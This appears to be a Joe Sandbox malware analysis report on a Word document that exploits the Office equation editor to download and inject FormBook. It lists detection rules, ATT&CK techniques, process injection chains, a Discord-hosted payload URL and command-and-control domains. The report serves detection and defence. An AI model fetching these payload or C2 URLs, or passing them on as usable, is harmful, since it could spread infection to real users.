          Source: Yara matchFile source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B9041E CreateBindCtx,SysAllocStringByteLen,SysFreeString,13_2_00B9041E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B91AA2 CreateBindCtx,MkParseDisplayName,13_2_00B91AA2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B866C1 CoCreateInstance,CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,13_2_00B866C1

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection712Scripting1LSASS MemoryAccount Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsShared Modules1Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSystem Information Discovery126Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
          Cloud AccountsExploitation for Client Execution33Network Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaCommand and Scripting Interpreter111Rc.commonRc.commonRootkit1Cached Domain CredentialsSecurity Software Discovery131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemVirtualization/Sandbox Evasion31Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion31/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection712Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532827 Sample: RFQ-CIF DT22.doc Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 41 google.com 2->41 49 Document contains OLE streams which likely are hidden ActiveX objects 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 15 other signatures 2->55 10 powershell.exe 4 16 2->10         started        14 WINWORD.EXE 292 21 2->14         started        17 EQNEDT32.EXE 47 2->17         started        signatures3 process4 dnsIp5 47 cdn.discordapp.com 162.159.135.233, 443, 49165 CLOUDFLARENETUS United States 10->47 71 Writes to foreign memory regions 10->71 73 Injects a PE file into a foreign processes 10->73 19 calc.exe 10->19         started        35 C:\Users\user\...\Client.vbs:Zone.Identifier, ASCII 14->35 dropped 37 C:\Users\user\AppData\Local\Temp\Client.vbs, ASCII 14->37 dropped 39 ~WRF{2A5D8C87-AF4E...D-D1E92A25FFAE}.tmp, Composite 14->39 dropped 75 Document exploit detected (creates forbidden files) 14->75 77 Microsoft Office drops suspicious files 14->77 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->79 22 cmd.exe 17->22         started        file6 signatures7 process8 signatures9 57 Modifies the context of a thread in another process (thread injection) 19->57 59 Maps a DLL or memory area into another process 19->59 61 Sample uses process hollowing technique 19->61 63 2 other signatures 19->63 24 explorer.exe 19->24 injected 28 cscript.exe 22->28         started        process10 dnsIp11 43 www.milan-sites.com 47.241.96.113, 49167, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 24->43 45 www.foodcartgps.net 24->45 65 System process connects to network (likely due to code injection or exploit) 24->65 30 cscript.exe 24->30         started        67 Creates processes via WMI 28->67 69 Tries to detect virtualization through RDTSC time measurements 28->69 signatures12 process13 signatures14 81 Modifies the context of a thread in another process (thread injection) 30->81 83 Maps a DLL or memory area into another process 30->83 33 cmd.exe 30->33         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ-CIF DT22.doc25%VirustotalBrowse
          RFQ-CIF DT22.doc16%ReversingLabsDocument-RTF.Trojan.Alien

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp100%AviraEXP/CVE-2017-11882.Gen

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.0.calc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.calc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.calc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.calc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.milan-sites.com/t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://schemas.open0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          www.cybocross.com/t1st/3%VirustotalBrowse
          www.cybocross.com/t1st/0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.milan-sites.com
          		47.241.96.113
          		truetrue
            		unknown
            google.com
            		216.58.215.238
            		truefalse
              		high
              cdn.discordapp.com
              		162.159.135.233
              		truefalse
                		high
                www.foodcartgps.net
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://cdn.discordapp.com/attachments/915347845752705109/915799206072045578/m.jpgfalse
                    		high
                    http://www.milan-sites.com/t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJtrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.cybocross.com/t1st/true
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpfalse
                      		high
                      http://investor.msn.comexplorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://wellformedweb.org/CommentAPI/explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.openformatrg/package/2006/content-tWINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.iis.fhg.de/audioPAexplorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmpfalse
                              		high
                              http://www.msn.com/?ocid=iehp2__explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpfalse
                                		high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.hotmail.com/oeexplorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://treyresearch.netexplorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.openWINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpfalse
                                      		high
                                      http://java.sun.comexplorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.icra.org/vocabulary/.explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmpfalse
                                          		high
                                          http://investor.msn.com/explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpfalse
                                            		high
                                            http://www.msn.com/?ocid=iehpexplorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.piriform.com/ccleanerexplorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://computername/printers/printername/.printerexplorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.%s.comPAWINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		low
                                                  http://www.autoitscript.com/autoit3explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpfalse
                                                    		high
                                                    https://support.mozilla.orgexplorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpfalse
                                                      		high
                                                      http://servername/isapibackend.dllcscript.exe, 00000006.00000002.414747436.0000000001FB0000.00000002.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      47.241.96.113
                                                      		www.milan-sites.comUnited States
                                                      		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                      162.159.135.233
                                                      		cdn.discordapp.comUnited States
                                                      		13335CLOUDFLARENETUSfalse

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:532827
                                                      Start date:02.12.2021
                                                      Start time:18:25:27
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 55s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:RFQ-CIF DT22.doc
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:17
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winDOC@12/12@5/2
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 23.6% (good quality ratio 22.2%)
                                                      • Quality average: 70.2%
                                                      • Quality standard deviation: 29.8%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 70
                                                      • Number of non-executed functions: 183
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .doc
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      18:25:20API Interceptor27x Sleep call for process: EQNEDT32.EXE modified
                                                      18:25:21API Interceptor241x Sleep call for process: cscript.exe modified
                                                      18:25:23API Interceptor336x Sleep call for process: powershell.exe modified
                                                      18:25:57API Interceptor92x Sleep call for process: calc.exe modified
                                                      18:27:03API Interceptor1x Sleep call for process: explorer.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      162.159.135.233We7WnoqeXe.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                                      mosoxxxHack.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                                      Sales-contract-deaho-180521-poweruae.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                                      PURCHASE ORDER E3007921.EXEGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                                      Waybill Document 22700456.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                                      COMPANY REQUIREMENT.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                                      Email data form.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
                                                      Down Payment.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                      Vessel details.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
                                                      Teklif Rusya 24 09 2020.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      google.comsv4q1RcC7y.exeGet hashmaliciousBrowse
                                                      • 172.217.168.68
                                                      RFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                                      • 172.217.168.83
                                                      REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                                      • 172.217.168.83
                                                      bUSzS84fr4.dllGet hashmaliciousBrowse
                                                      • 216.58.215.238
                                                      DHL Original shipping Document_pdf.ppamGet hashmaliciousBrowse
                                                      • 172.217.168.9
                                                      New Price List.ppamGet hashmaliciousBrowse
                                                      • 172.217.168.9
                                                      Hotel Guest List.ppamGet hashmaliciousBrowse
                                                      • 172.217.168.9
                                                      IRQ2107798.ppamGet hashmaliciousBrowse
                                                      • 172.217.168.9
                                                      AWB.ppamGet hashmaliciousBrowse
                                                      • 172.217.168.9
                                                      NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                      • 142.250.203.110
                                                      IRQ2107797.ppamGet hashmaliciousBrowse
                                                      • 172.217.168.9
                                                      lzJWJgZhPc.exeGet hashmaliciousBrowse
                                                      • 142.250.203.110
                                                      cdn.discordapp.comuATT8vAUK9.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      1Y0xc70fbX.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Document.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      new offers885111832.docxGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      new offers885111832.docxGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Narudzba.0953635637.PDF.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Orden de compra.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      WK1CQtJu13.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      SecuriteInfo.com.Packed-GDV0304D0F07C5D.24466.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      SecuriteInfo.com.W32.AIDetect.malware1.19028.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      I5TsW8WmSc.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      8VvzOu0uHY.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      koCttsCjGY.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      GenshinHack.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      invoice template 33142738819.docxGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      exel.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      DOC209272621615.PDF.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      CLOUDFLARENETUSRFQ00_3779028392.docGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      aRo4FhRug5.dllGet hashmaliciousBrowse
                                                      • 104.26.2.70
                                                      PaymentReceiptPDF.htmlGet hashmaliciousBrowse
                                                      • 104.16.19.94
                                                      Milleniumbpc.xlsxGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      uATT8vAUK9.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      1Y0xc70fbX.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Document.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      SecuriteInfo.com.Trojan.PWS.Siggen2.44034.6232.exeGet hashmaliciousBrowse
                                                      • 104.18.74.167
                                                      RFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                                      • 172.67.203.143
                                                      sk4e7kDlkb.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      new offers885111832.docxGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                                                      • 172.67.167.81
                                                      _0.htmlGet hashmaliciousBrowse
                                                      • 104.16.19.94
                                                      new offers885111832.docxGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      wXvjhk5m3v.htmlGet hashmaliciousBrowse
                                                      • 104.16.18.94
                                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      'Vm Note'ar_dept On Wed, 01 Dec 2021 220320 +0100.htmlGet hashmaliciousBrowse
                                                      • 104.16.19.94
                                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      TRANSFER VOUCHER 202101202-PDF.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      Narudzba.0953635637.PDF.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCorder 4544471372.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      order 4544471372.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      SecuriteInfo.com.Heur.31616.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      SecuriteInfo.com.Heur.26641.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      SecuriteInfo.com.Heur.5035.docGet hashmaliciousBrowse
                                                      • 8.209.79.68
                                                      SecuriteInfo.com.Heur.6074.docGet hashmaliciousBrowse
                                                      • 8.209.79.68
                                                      plans_48055147646.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      plans_48055147646.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      SecuriteInfo.com.Heur.31820.docGet hashmaliciousBrowse
                                                      • 8.209.79.68
                                                      SecuriteInfo.com.Heur.17389.docGet hashmaliciousBrowse
                                                      • 8.209.79.68
                                                      SecuriteInfo.com.Heur.28256.docGet hashmaliciousBrowse
                                                      • 8.209.79.68
                                                      invoice template929473689.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      invoice template929473689.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      variants_589243533.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      highlights-40677152292.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      variants_589243533.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      highlights-40677152292.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      variants_8857120413.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      variants_8857120413.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152
                                                      payment_4151226701.xlsGet hashmaliciousBrowse
                                                      • 149.129.254.152

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      7dcce5b76c8b17472d024758970a406bRFQ00_3779028392.docGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      new offers885111832.docxGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      counter-1248368226.xlsGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      counter-1248368226.xlsGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      CU-6431 report.xlsmGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      DHL Original shipping Document_pdf.ppamGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      New Price List.ppamGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      Hotel Guest List.ppamGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      IRQ2107798.ppamGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      AWB.ppamGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                                      • 162.159.135.233
